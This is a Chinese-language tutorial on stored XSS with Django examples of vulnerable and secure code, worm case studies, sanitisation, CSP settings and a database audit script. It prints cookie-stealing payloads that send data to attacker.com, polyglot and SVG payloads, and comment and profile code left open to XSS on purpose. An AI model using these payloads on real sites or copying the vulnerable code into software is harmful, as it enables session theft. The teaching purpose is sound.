Stored XSS:持久型跨站腳本攻擊

luk 收錄於 Web-Security

2025-01-15 約 2800 字預計閱讀 14 分鐘

⚠️ 免責聲明 本文內容僅供教育與學習用途。請勿將文中技術用於任何未經授權的系統或惡意目的。

📚 本篇重點

🎯 理解 Stored XSS 的攻擊原理與危害
💣 認識史上最著名的 XSS 蠕蟲攻擊
🛡️ 學習完整的資料庫存儲防禦策略
💼 掌握 Django 最佳實踐

閱讀時間: 約 20 分鐘難度: ⭐⭐⭐ 中高階

1️⃣ 什麼是 Stored XSS?

📖 定義

Stored XSS(持久型跨站腳本攻擊)是一種將惡意腳本永久儲存在目標伺服器(資料庫、檔案系統、訊息論壇等)的攻擊。當其他用戶訪問包含惡意腳本的頁面時,腳本會自動執行。

💣 為什麼是最危險的 XSS?

特徵	Reflected XSS	Stored XSS
影響範圍	單一用戶	🔴 所有訪問用戶
傳播能力	需要誘騙點擊	🔴 自動傳播
持續時間	一次性	🔴 永久存在
攻擊難度	較低	較高
檢測難度	較易	🔴 較難
清理難度	無需清理	🔴 需要清理資料庫

🔄 攻擊流程

Step 1: 攻擊者提交惡意腳本
        ↓
Step 2: 伺服器儲存到資料庫(未驗證/未編碼)
        ↓
Step 3: 其他用戶訪問頁面
        ↓
Step 4: 伺服器從資料庫讀取並顯示內容
        ↓
Step 5: 受害者瀏覽器執行惡意腳本
        ↓
Step 6: Cookie 被竊取 / 帳號被劫持 / 蠕蟲傳播

🌟 生活比喻

想像一個公共布告欄:

正常情況:

小明在布告欄貼上:「明天開會,請準時出席」
所有人看到後知道明天要開會

Stored XSS 攻擊:

攻擊者在布告欄貼上:「明天開會,請準時出席。【隱藏毒藥💉】」
所有看到布告欄的人都會中毒
毒藥會一直存在布告欄上,直到有人發現並清除

關鍵差異:

Reflected XSS = 攻擊者拿著毒藥挨個餵給受害者(需要誘騙)
Stored XSS = 攻擊者在公共水源投毒(自動傳播給所有人)

2️⃣ 真實案例分析

案例 1: MySpace Samy 蠕蟲 (2005) 🐛

史上最著名的 XSS 蠕蟲攻擊

攻擊者: Samy Kamkar(當時 19 歲)

漏洞細節:

MySpace 個人資料頁面沒有正確過濾用戶輸入
Samy 在自己的個人資料中注入了自我傳播的 JavaScript 代碼

攻擊代碼(簡化版):

// 當有人訪問 Samy 的個人頁面時
<div id="mycode">
<script>
// 1. 取得訪問者的個人資料
var friendID = getViewerID();

// 2. 在訪問者的個人資料中加入 "Samy is my hero"
addFriend('Samy');
addMessage('Samy is my hero');

// 3. 複製這段代碼到訪問者的個人資料(蠕蟲傳播!)
var payload = document.getElementById('mycode').innerHTML;
updateProfile(payload);
</script>
</div>

傳播速度:

第 1 小時: 幾十人感染
第 8 小時: 數千人感染
第 20 小時: 100 萬人感染! 🚀
最終: MySpace 被迫緊急關閉維修

後果:

Samy 被 FBI 逮捕,判處 3 年緩刑
MySpace 損失數百萬美元
成為 XSS 攻擊史上的經典案例

教訓: Stored XSS + 自我複製 = 災難級影響

案例 2: Twitter XSS 蠕蟲 (2010)

漏洞細節:

Twitter 的推文功能沒有正確過濾 onmouseover 事件

攻擊代碼:

<!-- 當鼠標移到推文上時觸發 -->
<script>
// 1. 彈出警告框
alert('XSS');

// 2. 自動轉推這條推文(蠕蟲傳播)
$.post('/retweet', {id: getCurrentTweetID()});
</script>

影響:

數萬用戶受影響
包括美國前總統 Barack Obama 的帳號
Twitter 緊急修復漏洞

案例 3: TweetDeck XSS (2014)

漏洞細節:

TweetDeck(Twitter 官方客戶端)沒有正確處理推文中的 HTML

攻擊 Payload:

<script class="xss">
$('.xss').parents().eq(1).find('a').eq(1).click();
$('[data-action=retweet]').click();
alert('XSS in Tweetdeck');
</script>

效果:

自動轉推
自動關注攻擊者
短時間內病毒式傳播

3️⃣ 容易受攻擊的應用場景

場景 1: 留言板 / 評論系統

❌ 危險範例 (Django)

# models.py
from django.db import models

class Comment(models.Model):
    author = models.CharField(max_length=100)
    content = models.TextField()  # 危險:儲存未過濾的 HTML
    created_at = models.DateTimeField(auto_now_add=True)

# views.py
from django.shortcuts import render, redirect
from .models import Comment

def add_comment(request):
    if request.method == 'POST':
        author = request.POST.get('author')
        content = request.POST.get('content')

        # 危險:直接儲存用戶輸入,沒有驗證或清理
        Comment.objects.create(
            author=author,
            content=content
        )

        return redirect('comments')

    return render(request, 'add_comment.html')

def view_comments(request):
    comments = Comment.objects.all()
    return render(request, 'comments.html', {'comments': comments})

<!-- templates/comments.html -->
<div class="comments">
{% for comment in comments %}
    <div class="comment">
        <strong>{{ comment.author }}</strong>
        <!-- 危險:使用 |safe 繞過 escaping -->
        <p>{{ comment.content|safe }}</p>
    </div>
{% endfor %}
</div>

攻擊 Payload:

<script>
// 竊取所有訪問者的 Cookie
fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>

✅ 安全範例 (Django)

# models.py
from django.db import models

class Comment(models.Model):
    author = models.CharField(max_length=100)
    content = models.TextField()  # 儲存純文字或已清理的內容
    created_at = models.DateTimeField(auto_now_add=True)

    class Meta:
        ordering = ['-created_at']

# forms.py
from django import forms
import bleach

class CommentForm(forms.Form):
    author = forms.CharField(
        max_length=100,
        required=True,
        strip=True
    )
    content = forms.CharField(
        widget=forms.Textarea,
        max_length=5000,
        required=True,
        strip=True
    )

    def clean_content(self):
        """清理內容,移除所有 HTML 標籤"""
        content = self.cleaned_data['content']

        # 方法 1: 完全移除 HTML(最安全)
        clean_content = bleach.clean(content, tags=[], strip=True)

        # 方法 2: 允許部分安全標籤(謹慎使用)
        # allowed_tags = ['p', 'br', 'strong', 'em']
        # clean_content = bleach.clean(
        #     content,
        #     tags=allowed_tags,
        #     strip=True
        # )

        return clean_content

# views.py
from django.shortcuts import render, redirect
from django.contrib import messages
from .models import Comment
from .forms import CommentForm

def add_comment(request):
    if request.method == 'POST':
        form = CommentForm(request.POST)

        if form.is_valid():
            # 使用已驗證和清理的數據
            Comment.objects.create(
                author=form.cleaned_data['author'],
                content=form.cleaned_data['content']
            )
            messages.success(request, '留言已發布')
            return redirect('comments')
        else:
            messages.error(request, '留言格式錯誤')
    else:
        form = CommentForm()

    return render(request, 'add_comment.html', {'form': form})

def view_comments(request):
    comments = Comment.objects.all()
    return render(request, 'comments.html', {'comments': comments})

<!-- templates/comments.html -->
<div class="comments">
{% for comment in comments %}
    <div class="comment">
        <!-- ✅ 安全:Django 自動 HTML escape -->
        <strong>{{ comment.author }}</strong>
        <!-- ✅ 安全:content 已在表單驗證時清理 -->
        <p>{{ comment.content }}</p>
    </div>
{% endfor %}
</div>

<!-- templates/add_comment.html -->
<form method="post">
    {% csrf_token %}
    {{ form.as_p }}
    <button type="submit">發布留言</button>
</form>

{% if messages %}
<ul class="messages">
    {% for message in messages %}
    <li class="{{ message.tags }}">{{ message }}</li>
    {% endfor %}
</ul>
{% endif %}

場景 2: 用戶個人資料

❌ 危險範例

# models.py
class UserProfile(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    bio = models.TextField(blank=True)  # 危險:自我介紹
    website = models.URLField(blank=True)  # 危險:個人網站
    signature = models.CharField(max_length=500, blank=True)  # 危險:簽名檔

# views.py
def update_profile(request):
    profile = request.user.profile

    if request.method == 'POST':
        # 危險:直接儲存用戶輸入
        profile.bio = request.POST.get('bio')
        profile.website = request.POST.get('website')
        profile.signature = request.POST.get('signature')
        profile.save()

        return redirect('profile', username=request.user.username)

    return render(request, 'edit_profile.html', {'profile': profile})

<!-- templates/profile.html -->
<div class="profile">
    <h2>{{ user.username }} 的個人資料</h2>

    <!-- 危險區域 -->
    <div class="bio">{{ profile.bio|safe }}</div>
    <div class="website">
        <a href="{{ profile.website }}">個人網站</a>
    </div>
    <div class="signature">{{ profile.signature|safe }}</div>
</div>

攻擊向量:

<!-- Bio 欄位 -->
<script>
document.location='http://attacker.com?c='+document.cookie;
</script>

<!-- Website 欄位 -->
javascript:alert(document.cookie)

<!-- Signature 欄位 -->
<img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)">

✅ 安全範例

# forms.py
from django import forms
from django.core.validators import URLValidator
import bleach

class ProfileForm(forms.ModelForm):
    class Meta:
        model = UserProfile
        fields = ['bio', 'website', 'signature']

    def clean_bio(self):
        bio = self.cleaned_data['bio']
        # 完全移除 HTML,只保留純文字
        return bleach.clean(bio, tags=[], strip=True)

    def clean_website(self):
        website = self.cleaned_data.get('website', '')

        if not website:
            return ''

        # 驗證 URL 格式
        validator = URLValidator(schemes=['http', 'https'])
        try:
            validator(website)
        except:
            raise forms.ValidationError('請輸入有效的 URL')

        # 防止 javascript: 協議
        if website.lower().startswith('javascript:'):
            raise forms.ValidationError('不允許的 URL 格式')

        return website

    def clean_signature(self):
        signature = self.cleaned_data['signature']

        # 允許部分格式化標籤
        allowed_tags = ['b', 'i', 'u']
        clean_signature = bleach.clean(
            signature,
            tags=allowed_tags,
            strip=True
        )

        return clean_signature

# views.py
from django.contrib.auth.decorators import login_required

@login_required
def update_profile(request):
    profile = request.user.profile

    if request.method == 'POST':
        form = ProfileForm(request.POST, instance=profile)

        if form.is_valid():
            form.save()
            messages.success(request, '個人資料已更新')
            return redirect('profile', username=request.user.username)
    else:
        form = ProfileForm(instance=profile)

    return render(request, 'edit_profile.html', {'form': form})

@login_required
def view_profile(request, username):
    user = get_object_or_404(User, username=username)
    profile = user.profile

    return render(request, 'profile.html', {
        'user': user,
        'profile': profile
    })

<!-- templates/profile.html -->
<div class="profile">
    <h2>{{ user.username }} 的個人資料</h2>

    <!-- ✅ 安全:已在儲存時清理,這裡自動 escape -->
    <div class="bio">{{ profile.bio }}</div>

    <!-- ✅ 安全:已驗證 URL 格式 -->
    {% if profile.website %}
    <div class="website">
        <a href="{{ profile.website }}" rel="noopener noreferrer" target="_blank">
            個人網站
        </a>
    </div>
    {% endif %}

    <!-- ✅ 安全:只允許 <b><i><u> 標籤 -->
    <div class="signature">{{ profile.signature|safe }}</div>
</div>

場景 3: 論壇 / 社交媒體

❌ 危險範例

# models.py
class Post(models.Model):
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    title = models.CharField(max_length=200)
    content = models.TextField()  # 危險:支援 HTML
    created_at = models.DateTimeField(auto_now_add=True)

# views.py
def create_post(request):
    if request.method == 'POST':
        # 危險:直接儲存 HTML 內容
        Post.objects.create(
            author=request.user,
            title=request.POST['title'],
            content=request.POST['content']
        )
        return redirect('posts')

    return render(request, 'create_post.html')

<!-- templates/post_detail.html -->
<article>
    <h1>{{ post.title }}</h1>
    <div class="author">作者: {{ post.author.username }}</div>

    <!-- 危險:直接顯示 HTML -->
    <div class="content">
        {{ post.content|safe }}
    </div>
</article>

✅ 安全範例(使用 Markdown)

# models.py
from django.db import models
import markdown
import bleach

class Post(models.Model):
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    title = models.CharField(max_length=200)
    markdown_content = models.TextField()  # 儲存 Markdown
    html_content = models.TextField()  # 儲存處理後的 HTML
    created_at = models.DateTimeField(auto_now_add=True)

    def save(self, *args, **kwargs):
        # 轉換 Markdown 為 HTML
        html = markdown.markdown(
            self.markdown_content,
            extensions=['extra', 'codehilite', 'nl2br']
        )

        # 清理 HTML,只允許安全標籤
        allowed_tags = [
            'p', 'br', 'strong', 'em', 'u', 'h1', 'h2', 'h3',
            'ul', 'ol', 'li', 'code', 'pre', 'blockquote',
            'a', 'img'
        ]
        allowed_attributes = {
            'a': ['href', 'title'],
            'img': ['src', 'alt', 'title'],
            'code': ['class'],  # For syntax highlighting
        }

        self.html_content = bleach.clean(
            html,
            tags=allowed_tags,
            attributes=allowed_attributes,
            strip=True
        )

        # 進一步驗證連結
        self.html_content = bleach.linkify(
            self.html_content,
            callbacks=[self.validate_link]
        )

        super().save(*args, **kwargs)

    @staticmethod
    def validate_link(attrs, new=False):
        """驗證連結安全性"""
        href = attrs.get((None, 'href'), '')

        # 只允許 http/https
        if not href.startswith(('http://', 'https://')):
            return None

        # 添加安全屬性
        attrs[(None, 'rel')] = 'noopener noreferrer'
        attrs[(None, 'target')] = '_blank'

        return attrs

# forms.py
class PostForm(forms.ModelForm):
    class Meta:
        model = Post
        fields = ['title', 'markdown_content']
        widgets = {
            'markdown_content': forms.Textarea(attrs={
                'placeholder': '支援 Markdown 語法...'
            })
        }

    def clean_title(self):
        title = self.cleaned_data['title']
        # 移除標題中的 HTML 標籤
        return bleach.clean(title, tags=[], strip=True)

# views.py
from django.contrib.auth.decorators import login_required

@login_required
def create_post(request):
    if request.method == 'POST':
        form = PostForm(request.POST)

        if form.is_valid():
            post = form.save(commit=False)
            post.author = request.user
            post.save()  # 會自動處理 Markdown -> HTML

            messages.success(request, '文章已發布')
            return redirect('post_detail', pk=post.pk)
    else:
        form = PostForm()

    return render(request, 'create_post.html', {'form': form})

def post_detail(request, pk):
    post = get_object_or_404(Post, pk=pk)
    return render(request, 'post_detail.html', {'post': post})

<!-- templates/post_detail.html -->
<article>
    <!-- ✅ 安全:標題已清理 -->
    <h1>{{ post.title }}</h1>

    <div class="meta">
        作者: {{ post.author.username }}
        |
        發布時間: {{ post.created_at|date:"Y-m-d H:i" }}
    </div>

    <!-- ✅ 安全:HTML 已在儲存時清理和驗證 -->
    <div class="content markdown-body">
        {{ post.html_content|safe }}
    </div>

    <!-- 顯示原始 Markdown(用於編輯) -->
    {% if user == post.author %}
    <details>
        <summary>查看原始 Markdown</summary>
        <pre>{{ post.markdown_content }}</pre>
    </details>
    {% endif %}
</article>

為什麼 Markdown 更安全?

✅ 用戶只能寫 Markdown,不能直接寫 HTML
✅ Markdown 轉 HTML 是可控的過程
✅ 可以用 bleach 再次清理生成的 HTML
✅ 即使繞過 Markdown,bleach 也會阻擋惡意代碼

4️⃣ 進階攻擊技巧

技巧 1: Polyglot Payload(多語境 Payload)

在不同的 HTML 上下文中都能執行:

<!-- 同時在 HTML、JavaScript、CSS 上下文中執行 -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

技巧 2: 利用 SVG

<!-- SVG 可以嵌入 JavaScript -->
<svg onload="alert('XSS')">

<!-- 更複雜的 SVG Payload -->
<svg><script>alert&#40;'XSS'&#41;</script></svg>

<!-- 使用 foreignObject -->
<svg><foreignObject><body onload="alert('XSS')"></foreignObject></svg>

技巧 3: 利用 HTML5 新特性

<!-- autofocus + onfocus -->
<input autofocus onfocus="alert('XSS')">

<!-- formaction -->
<form><button formaction="javascript:alert('XSS')">Submit</button></form>

<!-- poster 屬性 -->
<video poster="javascript:alert('XSS')">

<!-- onerror 事件 -->
<img src=x onerror="alert('XSS')">
<audio src=x onerror="alert('XSS')">

5️⃣ 完整防禦策略

防禦層級架構

┌─────────────────────────────────────────────┐
│  Layer 1: 輸入驗證(Input Validation)         │
│  - Django Forms                             │
│  - 長度限制                                  │
│  - 格式驗證                                  │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 2: 內容清理(Sanitization) ⭐          │
│  - Bleach (HTML 白名單過濾)                  │
│  - Markdown (推薦)                          │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 3: 輸出編碼(Output Encoding) ⭐       │
│  - Django Template Auto-escaping           │
│  - 避免 |safe                               │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 4: CSP(Content Security Policy)     │
│  - script-src 'self'                       │
│  - no inline scripts                       │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 5: Cookie 安全                       │
│  - HttpOnly                                │
│  - Secure                                  │
│  - SameSite                                │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 6: 監控與審計(Monitoring)             │
│  - 記錄所有用戶提交                          │
│  - 異常檢測                                  │
└─────────────────────────────────────────────┘

Django 完整安全配置

# settings.py

# ==================== 基礎安全 ====================
DEBUG = False
SECRET_KEY = os.environ.get('SECRET_KEY')
ALLOWED_HOSTS = ['example.com', 'www.example.com']

# ==================== Cookie 安全 ====================
SESSION_COOKIE_HTTPONLY = True
SESSION_COOKIE_SECURE = True  # 只在 HTTPS 傳輸
SESSION_COOKIE_SAMESITE = 'Strict'
SESSION_COOKIE_AGE = 3600  # 1 小時後過期

CSRF_COOKIE_HTTPONLY = True
CSRF_COOKIE_SECURE = True
CSRF_COOKIE_SAMESITE = 'Strict'

# ==================== CSP (使用 django-csp) ====================
# pip install django-csp
MIDDLEWARE = [
    # ...
    'csp.middleware.CSPMiddleware',
]

CSP_DEFAULT_SRC = ("'none'",)
CSP_SCRIPT_SRC = ("'self'",)
CSP_STYLE_SRC = ("'self'",)
CSP_IMG_SRC = ("'self'", "data:", "https:")
CSP_FONT_SRC = ("'self'",)
CSP_CONNECT_SRC = ("'self'",)
CSP_FRAME_ANCESTORS = ("'none'",)
CSP_BASE_URI = ("'self'",)
CSP_FORM_ACTION = ("'self'",)

# Nonce for inline scripts (if needed)
CSP_INCLUDE_NONCE_IN = ['script-src']

# ==================== Security Headers ====================
SECURE_BROWSER_XSS_FILTER = True
SECURE_CONTENT_TYPE_NOSNIFF = True
X_FRAME_OPTIONS = 'DENY'

SECURE_SSL_REDIRECT = True  # 強制 HTTPS
SECURE_HSTS_SECONDS = 31536000  # 1 year
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_PRELOAD = True

# ==================== Template 設定 ====================
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'OPTIONS': {
            'context_processors': [
                # ...
            ],
            'autoescape': True,  # ✅ 確保開啟(預設就是 True)
        },
    },
]

# ==================== 安裝必要套件 ====================
# requirements.txt:
# django-csp==3.7
# bleach==6.0.0
# markdown==3.4.3

使用 Bleach 清理 HTML

# utils/sanitizer.py
import bleach
from bleach.css_sanitizer import CSSSanitizer

# 預設的安全標籤白名單
ALLOWED_TAGS = [
    'p', 'br', 'strong', 'em', 'u', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
    'blockquote', 'code', 'pre', 'ul', 'ol', 'li', 'a', 'img', 'hr',
    'table', 'thead', 'tbody', 'tr', 'th', 'td'
]

ALLOWED_ATTRIBUTES = {
    'a': ['href', 'title', 'rel'],
    'img': ['src', 'alt', 'title', 'width', 'height'],
    'code': ['class'],  # For syntax highlighting
    'pre': ['class'],
    'table': ['class'],
    'th': ['class'],
    'td': ['class'],
}

ALLOWED_STYLES = ['color', 'background-color', 'font-weight', 'text-align']

css_sanitizer = CSSSanitizer(allowed_css_properties=ALLOWED_STYLES)

def sanitize_html(html_content, allowed_tags=None, allowed_attributes=None):
    """
    清理 HTML 內容,移除危險標籤和屬性

    Args:
        html_content: 要清理的 HTML 字串
        allowed_tags: 允許的標籤列表(可選)
        allowed_attributes: 允許的屬性字典(可選)

    Returns:
        清理後的安全 HTML 字串
    """
    if allowed_tags is None:
        allowed_tags = ALLOWED_TAGS

    if allowed_attributes is None:
        allowed_attributes = ALLOWED_ATTRIBUTES

    # 清理 HTML
    clean_html = bleach.clean(
        html_content,
        tags=allowed_tags,
        attributes=allowed_attributes,
        css_sanitizer=css_sanitizer,
        strip=True,  # 移除不允許的標籤,而非轉義
        strip_comments=True  # 移除 HTML 註解
    )

    # 處理連結
    clean_html = bleach.linkify(
        clean_html,
        callbacks=[validate_link],
        skip_tags=['pre', 'code']  # 不要在代碼區塊中自動連結
    )

    return clean_html

def validate_link(attrs, new=False):
    """驗證連結的安全性"""
    href = attrs.get((None, 'href'), '')

    # 只允許 http/https/mailto
    if not href.startswith(('http://', 'https://', 'mailto:')):
        return None

    # 防止 javascript: 協議
    if 'javascript:' in href.lower():
        return None

    # 添加安全屬性
    attrs[(None, 'rel')] = 'noopener noreferrer'
    if href.startswith(('http://', 'https://')):
        attrs[(None, 'target')] = '_blank'

    return attrs

def sanitize_text(text):
    """
    完全移除所有 HTML 標籤,只保留純文字

    用於:用戶名稱、標題等不應包含任何格式的欄位
    """
    return bleach.clean(text, tags=[], strip=True)


# 使用範例
if __name__ == '__main__':
    # 測試 1: 移除惡意腳本
    malicious_html = '''
    <p>正常內容</p>
    <script>alert('XSS')</script>
    <img src=x onerror="alert('XSS')">
    '''
    print(sanitize_html(malicious_html))
    # 輸出: <p>正常內容</p>

    # 測試 2: 只保留純文字
    text_with_html = '<strong>用戶名</strong><script>alert(1)</script>'
    print(sanitize_text(text_with_html))
    # 輸出: 用戶名

在 Django 中使用

# models.py
from django.db import models
from utils.sanitizer import sanitize_html, sanitize_text

class BlogPost(models.Model):
    title = models.CharField(max_length=200)
    raw_content = models.TextField()  # 原始內容(Markdown 或 HTML)
    clean_content = models.TextField()  # 清理後的 HTML
    author = models.ForeignKey(User, on_delete=models.CASCADE)

    def save(self, *args, **kwargs):
        # 在儲存前清理內容
        self.title = sanitize_text(self.title)
        self.clean_content = sanitize_html(self.raw_content)
        super().save(*args, **kwargs)

# views.py
from django.shortcuts import render, get_object_or_404
from .models import BlogPost

def post_detail(request, pk):
    post = get_object_or_404(BlogPost, pk=pk)

    return render(request, 'post_detail.html', {
        'post': post
    })

<!-- templates/post_detail.html -->
<article>
    <!-- ✅ title 已清理,只包含純文字 -->
    <h1>{{ post.title }}</h1>

    <div class="meta">
        作者: {{ post.author.username }}
    </div>

    <!-- ✅ clean_content 已清理,只包含安全 HTML -->
    <div class="content">
        {{ post.clean_content|safe }}
    </div>
</article>

6️⃣ 檢測與審計

手動檢測

# security_audit.py
"""
檢測資料庫中是否存在潛在的 XSS Payload
"""
from django.contrib.auth.models import User
from myapp.models import Comment, Post, UserProfile
import re

# 危險模式列表
DANGEROUS_PATTERNS = [
    r'<script',
    r'javascript:',
    r'onerror\s*=',
    r'onload\s*=',
    r'onclick\s*=',
    r'<iframe',
    r'<embed',
    r'<object',
]

def audit_model(model, field_name):
    """審計特定模型的特定欄位"""
    print(f"\n審計 {model.__name__}.{field_name}...")

    suspicious_objects = []

    for obj in model.objects.all():
        content = getattr(obj, field_name, '')

        if not content:
            continue

        # 檢查是否包含危險模式
        for pattern in DANGEROUS_PATTERNS:
            if re.search(pattern, content, re.IGNORECASE):
                suspicious_objects.append({
                    'id': obj.id,
                    'content': content[:100],  # 只顯示前 100 字
                    'pattern': pattern
                })
                break

    if suspicious_objects:
        print(f"  ⚠️  發現 {len(suspicious_objects)} 個可疑物件:")
        for obj in suspicious_objects:
            print(f"    ID: {obj['id']}")
            print(f"    內容: {obj['content']}...")
            print(f"    匹配模式: {obj['pattern']}\n")
    else:
        print(f"  ✅ 未發現可疑內容")

    return suspicious_objects

# 執行審計
if __name__ == '__main__':
    # 審計留言
    audit_model(Comment, 'content')

    # 審計文章
    audit_model(Post, 'content')

    # 審計用戶個人資料
    audit_model(UserProfile, 'bio')
    audit_model(UserProfile, 'signature')

自動化清理

# clean_database.py
"""
清理資料庫中的 XSS Payload
"""
from django.db import transaction
from myapp.models import Comment, Post
from utils.sanitizer import sanitize_html
import logging

logger = logging.getLogger(__name__)

@transaction.atomic
def clean_comments():
    """清理所有留言"""
    comments = Comment.objects.all()
    cleaned_count = 0

    for comment in comments:
        original_content = comment.content
        comment.content = sanitize_html(original_content)

        if comment.content != original_content:
            comment.save()
            cleaned_count += 1
            logger.warning(f"清理留言 ID={comment.id}")

    print(f"清理了 {cleaned_count} 條留言")
    return cleaned_count

@transaction.atomic
def clean_posts():
    """清理所有文章"""
    posts = Post.objects.all()
    cleaned_count = 0

    for post in posts:
        original_content = post.content
        post.content = sanitize_html(original_content)

        if post.content != original_content:
            post.save()
            cleaned_count += 1
            logger.warning(f"清理文章 ID={post.id}")

    print(f"清理了 {cleaned_count} 篇文章")
    return cleaned_count

if __name__ == '__main__':
    print("開始清理資料庫...")
    clean_comments()
    clean_posts()
    print("清理完成!")

7️⃣ 面試常見問題

Q1: Stored XSS 為什麼比 Reflected XSS 更危險?

參考答案:

1. 影響範圍更廣:

Reflected XSS: 只影響點擊惡意連結的用戶
Stored XSS: 影響所有訪問該頁面的用戶

2. 持續時間更長:

Reflected XSS: 一次性攻擊
Stored XSS: 惡意腳本永久存在,直到被發現並清除

3. 攻擊更隱蔽:

Reflected XSS: URL 中可能看到惡意代碼
Stored XSS: 惡意代碼隱藏在資料庫中,難以發現

4. 可以形成蠕蟲:

如 MySpace Samy 蠕蟲,Stored XSS 可以自我複製,呈指數級傳播

5. 清理難度更高:

Reflected XSS: 無需清理
Stored XSS: 需要清理資料庫中的所有惡意數據

實際案例: MySpace Samy 蠕蟲在 20 小時內感染 100 萬用戶,這種傳播速度只有 Stored XSS 能做到。

Q2: 在 Django 中,如何安全地允許用戶提交富文本內容?

參考答案:

推薦方案 1: 使用 Markdown(最佳實踐)

# 1. 用戶輸入 Markdown
# 2. 轉換為 HTML
# 3. 用 bleach 清理
# 4. 儲存到資料庫

import markdown
import bleach

class Post(models.Model):
    markdown_content = models.TextField()
    html_content = models.TextField()

    def save(self, *args, **kwargs):
        # Step 1: Markdown -> HTML
        html = markdown.markdown(self.markdown_content)

        # Step 2: 清理 HTML
        self.html_content = bleach.clean(
            html,
            tags=['p', 'strong', 'em', 'a', 'code', 'pre'],
            attributes={'a': ['href']},
            strip=True
        )

        super().save(*args, **kwargs)

優點:

✅ 用戶無法直接寫 HTML
✅ 生成的 HTML 是可控的
✅ 支援常見格式化需求
✅ 安全性高

推薦方案 2: 使用 Bleach 白名單過濾 HTML

import bleach

def save_content(user_html):
    # 只允許安全標籤
    clean_html = bleach.clean(
        user_html,
        tags=['p', 'br', 'strong', 'em', 'u', 'a'],
        attributes={'a': ['href', 'title']},
        strip=True
    )

    # 進一步驗證連結
    clean_html = bleach.linkify(clean_html)

    return clean_html

優點:

✅ 使用白名單,只允許明確安全的標籤
✅ 可以允許部分格式化
✅ bleach 是專門為此設計的庫

❌ 不推薦方案: 黑名單過濾

# ❌ 不安全!
def unsafe_clean(html):
    # 嘗試移除危險標籤
    html = html.replace('<script>', '')
    html = html.replace('onerror=', '')
    # ...更多替換
    return html

問題:

可以用大小寫繞過: <ScRiPt>
可以用編碼繞過: <script>
永遠無法窮盡所有危險模式

關鍵原則: 白名單 > 黑名單

Q3: 如果發現生產環境的資料庫中已經有 XSS Payload,應該如何處理?

參考答案:

緊急應對流程:

Step 1: 立即減輕影響

# 1. 暫時關閉受影響的功能或頁面
# 2. 在 Template 中移除所有 |safe
# 3. 部署修復

Step 2: 識別受影響的數據

# security_audit.py
def find_xss_payloads():
    suspicious = []

    for comment in Comment.objects.all():
        if '<script' in comment.content.lower():
            suspicious.append(comment)

    return suspicious

affected_comments = find_xss_payloads()
print(f"發現 {len(affected_comments)} 條可疑留言")

Step 3: 清理數據

from django.db import transaction
from utils.sanitizer import sanitize_html

@transaction.atomic
def clean_database():
    # 備份資料庫(重要!)
    # pg_dump mydb > backup.sql

    # 清理所有受影響的記錄
    for comment in Comment.objects.all():
        original = comment.content
        comment.content = sanitize_html(original)

        if comment.content != original:
            comment.save()
            logger.warning(f"清理 Comment ID={comment.id}")

clean_database()

Step 4: 審計與記錄

# 記錄所有被清理的內容
class SecurityAuditLog(models.Model):
    model_name = models.CharField(max_length=100)
    object_id = models.IntegerField()
    original_content = models.TextField()
    cleaned_content = models.TextField()
    cleaned_at = models.DateTimeField(auto_now_add=True)

Step 5: 預防未來攻擊

# 1. 實施 Content Sanitization
# 2. 啟用 CSP
# 3. 設置 HttpOnly Cookie
# 4. 添加輸入驗證
# 5. 定期安全掃描

Step 6: 通知用戶(如果需要)

# 如果有敏感信息洩露(如 Cookie 被竊取)
# 需要:
# 1. 強制所有用戶重新登入
# 2. 發送安全通知郵件
# 3. 建議用戶更改密碼

預防措施:

✅ 實施多層防禦
✅ 定期安全審計
✅ 自動化安全掃描
✅ 記錄所有用戶提交
✅ 異常檢測與告警

8️⃣ 重點回顧

核心概念

Stored XSS 的特徵:
- 持久性: 惡意腳本儲存在伺服器
- 自動傳播: 訪問即觸發
- 影響範圍廣: 所有用戶
- 可形成蠕蟲: 自我複製和傳播
最危險的場景:
- 留言板 / 評論系統
- 用戶個人資料(bio, signature)
- 論壇 / 社交媒體
- 任何用戶可以提交並永久儲存內容的地方
防禦的黃金法則:
- 永遠不要信任用戶輸入
- 白名單 > 黑名單
- 多層防禦
- 深度防禦(Defense in Depth)
Django 最佳實踐:
- ✅ 使用 Markdown 而非 HTML
- ✅ 使用 Bleach 白名單過濾
- ✅ Django Template 自動 escaping
- ✅ 避免 |safe 和 mark_safe
- ✅ 實施 CSP
- ✅ HttpOnly Cookie
- ✅ 定期安全審計

防禦檢查清單

輸入階段:

使用 Django Forms 驗證
限制長度和格式
使用 bleach 清理 HTML

儲存階段:

在 save() 方法中清理內容
儲存原始內容和清理後的內容(Markdown + HTML)
記錄審計日誌

輸出階段:

使用 Django Template 自動 escaping
避免 |safe(除非內容已清理)
實施 CSP

Cookie 安全:

SESSION_COOKIE_HTTPONLY = True
CSRF_COOKIE_HTTPONLY = True
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_SAMESITE = 'Strict'

監控:

定期掃描資料庫(security_audit.py)
記錄所有用戶提交
異常檢測

📖 延伸閱讀

🔗 系列導航

上一篇: 03-2 Reflected XSS:反射型跨站腳本攻擊
下一篇: 03-4 DOM-based XSS:基於 DOM 的跨站腳本攻擊
返回目錄: Web Security 系列

📝 本文完成日期: 2025-01-15 🔖 標籤: #WebSecurity #XSS #StoredXSS #Django #Python #面試準備